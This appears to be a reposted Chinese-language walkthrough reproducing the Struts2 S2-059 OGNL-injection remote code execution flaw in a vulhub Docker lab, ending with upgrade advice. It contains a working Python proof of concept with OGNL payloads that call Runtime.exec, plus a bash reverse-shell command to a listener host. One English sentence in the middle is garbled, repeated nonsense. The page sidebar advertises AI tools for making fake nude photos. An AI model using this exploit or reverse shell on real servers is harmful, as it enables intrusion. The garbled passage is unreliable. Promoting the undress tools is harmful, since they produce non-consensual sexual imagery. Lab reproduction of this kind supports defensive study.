Struts2 S2-059 遠端程式碼執行漏洞復現是怎麼樣的

Struts2 S2-059 遠端程式碼執行漏洞復現是怎麼樣的

May 23, 2023 pm 10:37 PM

struts2

0x00簡介

Struts2 是 Apache 軟體組織推出的一個相當強大的 Java Web 開源框架,本質上相當於一個 servlet。 Struts2 基於 MVC 架構,框架結構清晰。通常作為控制器(Controller)來建立模型與視圖的資料交互,用於創建企業級 Java web 應用程序，它利用並延伸了Java Servlet API，鼓勵開發者採用MVC架構。 Struts2以WebWork優秀的設計思想為核心，吸收了Struts框架的部分優點，提供了一個更整潔的MVC設計模式實現的Web應用程式框架。

0x01漏洞概述

攻擊者可以透過建構惡意的OGNL表達式，並將其設定到可被外部輸入進行修改，並且會執行OGNL表達式的Struts2標籤的屬性值，引發OGNL表達式解析，最終造成遠端程式碼執行的影響。

0x02影響範圍

Struts 2.0.0 – Struts 2.5.20

0x03環境建置

#1.本次漏洞環境使用vulhub快速搭建，vulhub下載位址如下：

https://github.com/vulhub/vulhub

cd vulhub-master/struts2/s2-059

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

2.使用docker-compose快速建立目標場環境

docker-compose up -d

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

3.啟動完成後在瀏覽器存取http://ip:8080/?id=1 就可以看到測試介面

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

0x04漏洞

1.在瀏覽器存取http://ip:8080/?id=%{88*88}，可以發現執行的88*88成功被解析了，會執行OGNL表達式的Struts2標籤的屬性值，引發OGNL表達式解析。

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

2.使用poc來反彈shell，反彈shell的payload需要使用base64編碼

bash -i >& /dev/tcp/172.16. 1.132/9967 0>&1

base64編碼網址：

The original sentence is already a complete sentence that is providing a link. If I were to rewrite it, sentence that is providing a link. If I were to rewrite it, it could be something like be something like it, something like it, something like be something like be something like like like Here is a link to a webpage containing information about runtime exec payloads: http://www.jackson-t.ca/runtime-exec-payloads.html.

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

import requests

url = "http://127.0.0.1:8080"

data1 = {

"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"

}

data2 = {

"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('payload-base64编码'))}"

}

res1 = requests.post(url, data=data1)

res2 = requests.post(url, data=data2)

Struts2 S2-059 远程代码执行漏洞复现是怎么样的 3.修改poc中的payload為自己的payload，然後使用python運行，可以看到反彈了shell

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

0x05修復建議

1.升級到Struts 2.5.22或更高版本

2. 開啟ONGL表達式註入保護措施。 ######https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable###

以上是Struts2 S2-059 遠端程式碼執行漏洞復現是怎麼樣的的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文轉載於：亿速云。如有侵權，請聯絡admin@php.cn刪除

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序，用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具，輕鬆在任何影片中換臉！

熱門文章

刺客信條陰影：貝殼謎語解決方案

3 週前ByDDD

Windows 11 KB5054979中的新功能以及如何解決更新問題

2 週前ByDDD

在哪裡可以找到原子中的起重機控制鑰匙卡

3 週前ByDDD

<🎜>：死鐵路 - 如何完成所有挑戰

4 週前ByDDD

Atomfall指南：項目位置，任務指南和技巧

1 個月前ByDDD

熱工具

VSCode Windows 64位元下載

VSCode Windows 64位元下載

微軟推出的免費、功能強大的一款IDE編輯器

ZendStudio 13.5.1 Mac

ZendStudio 13.5.1 Mac

強大的PHP整合開發環境

MantisBT

MantisBT

Mantis是一個易於部署的基於Web的缺陷追蹤工具，用於幫助產品缺陷追蹤。它需要PHP、MySQL和一個Web伺服器。請查看我們的演示和託管服務。

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

mPDF

mPDF

mPDF是一個PHP庫，可以從UTF-8編碼的HTML產生PDF檔案。原作者Ian Back編寫mPDF以從他的網站上「即時」輸出PDF文件，並處理不同的語言。與原始腳本如HTML2FPDF相比，它的速度較慢，並且在使用Unicode字體時產生的檔案較大，但支援CSS樣式等，並進行了大量增強。支援幾乎所有語言，包括RTL（阿拉伯語和希伯來語）和CJK（中日韓）。支援嵌套的區塊級元素（如P、DIV），

熱門話題

gmail信箱登陸入口在哪裡

7681

15

1639

14

1393

52

1286

25

1229

29